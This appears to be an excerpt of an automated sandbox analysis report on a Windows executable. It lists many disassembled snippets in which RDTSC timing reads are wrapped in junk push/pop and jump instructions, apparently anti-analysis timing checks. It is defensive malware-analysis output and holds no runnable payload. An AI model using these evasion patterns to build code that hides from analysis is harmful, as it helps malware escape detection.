Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A78 second address: 554A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A3600h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A8E second address: 554A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A95 second address: 554ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10A35FDh 0x00000009 popad 0x0000000a jp 00007F5BC10A3608h 0x00000010 jmp 00007F5BC10A35FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554D35 second address: 554D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554EC0 second address: 554ECE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554ECE second address: 554ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55518E second address: 5551A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5BC10A35FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5551A4 second address: 5551B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5551B4 second address: 5551C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jno 00007F5BC10A35F6h 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5551C8 second address: 5551FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5BC10B70A3h 0x0000000a pushad 0x0000000b jmp 00007F5BC10B709Ch 0x00000010 jmp 00007F5BC10B709Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55533D second address: 555368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10A3601h 0x00000008 jmp 00007F5BC10A35FDh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555368 second address: 55536E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555639 second address: 555643 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555643 second address: 555647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555773 second address: 555777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555777 second address: 5557A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5BC10B709Ch 0x00000011 jno 00007F5BC10B7096h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F5BC10B709Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557A8 second address: 5557AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557AC second address: 5557B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557B2 second address: 5557B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557B8 second address: 5557C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B709Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557C6 second address: 5557F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5BC10A35F6h 0x00000008 jmp 00007F5BC10A35FBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5BC10A3604h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5557F1 second address: 5557F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 555F99 second address: 555F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5544CF second address: 554505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b jmp 00007F5BC10B70A9h 0x00000010 je 00007F5BC10B709Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554505 second address: 554509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BE93 second address: 55BEAB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BC10B7096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5BC10B709Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BEAB second address: 55BEB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BEB0 second address: 55BECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 jmp 00007F5BC10B709Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F5BC10B70AAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BECE second address: 55BED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55BED2 second address: 55BED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568AD4 second address: 568ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568ADC second address: 568B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F5BC10B7096h 0x0000000c popad 0x0000000d jc 00007F5BC10B70ABh 0x00000013 jmp 00007F5BC10B709Fh 0x00000018 jg 00007F5BC10B7096h 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007F5BC10B7096h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568B0C second address: 568B1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568B1A second address: 568B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568B21 second address: 568B31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5BC10A35FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56880C second address: 56881F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B709Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56881F second address: 568823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 568823 second address: 568829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56C7EE second address: 56C80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5BC10A3608h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56C80C second address: 56C816 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10B7096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 56C97A second address: 56C980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 57BDB2 second address: 57BDEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007F5BC10B7096h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F5BC10B70A8h 0x00000014 jmp 00007F5BC10B70A1h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58353E second address: 583544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583544 second address: 583549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583699 second address: 5836A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F5BC10A35F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58396D second address: 583973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583973 second address: 58397D instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58397D second address: 583984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583984 second address: 5839A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5BC10A35FBh 0x0000000f jng 00007F5BC10A35F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583D7D second address: 583D83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583D83 second address: 583D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 583D88 second address: 583DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5BC10B7096h 0x0000000a popad 0x0000000b jmp 00007F5BC10B70A7h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F5BC10B7096h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58992A second address: 58992E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58992E second address: 589934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 589620 second address: 58963A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F5BC10A35F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 58963A second address: 58963E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 593455 second address: 59345A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 59345A second address: 593465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5BC10B7096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 596726 second address: 596740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F5BC10A35F6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 je 00007F5BC10A35F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5998B2 second address: 5998B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5998B6 second address: 5998C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5998C0 second address: 5998CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 59E786 second address: 59E790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 59E790 second address: 59E7B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 59BC23 second address: 59BC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10A35FEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5AB47D second address: 5AB4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F5BC10B70A7h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F5BC10B709Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5AB5E0 second address: 5AB5EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C43D1 second address: 5C43D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47A6 second address: 5C47D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 jmp 00007F5BC10A3600h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F5BC10A3604h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47D8 second address: 5C47DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47DE second address: 5C47EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5BC10A35F6h 0x0000000a je 00007F5BC10A35F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47EE second address: 5C47F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47F2 second address: 5C47F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C47F8 second address: 5C4804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4946 second address: 5C494C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C494C second address: 5C4951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4951 second address: 5C4959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4C96 second address: 5C4CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5BC10B709Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4E4C second address: 5C4E70 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jmp 00007F5BC10A3602h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4E70 second address: 5C4E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4E76 second address: 5C4E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C4E7A second address: 5C4E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C6C91 second address: 5C6C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C6C95 second address: 5C6C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C6C9B second address: 5C6CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5C6CA4 second address: 5C6CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A9h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F5BC10B7096h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5CB018 second address: 5CB02F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5BC10A35FEh 0x0000000c push edx 0x0000000d pop edx 0x0000000e jo 00007F5BC10A35F6h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5CD006 second address: 5CD026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B709Ch 0x0000000c jmp 00007F5BC10B709Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5CD026 second address: 5CD041 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10A35FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C009A second address: 50C00A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0E80 second address: 50A0ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10A3601h 0x00000009 or esi, 1E79E526h 0x0000000f jmp 00007F5BC10A3601h 0x00000014 popfd 0x00000015 mov esi, 7A4F6657h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F5BC10A35FAh 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 mov dx, si 0x00000029 mov edx, ecx 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0ED0 second address: 50A0ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
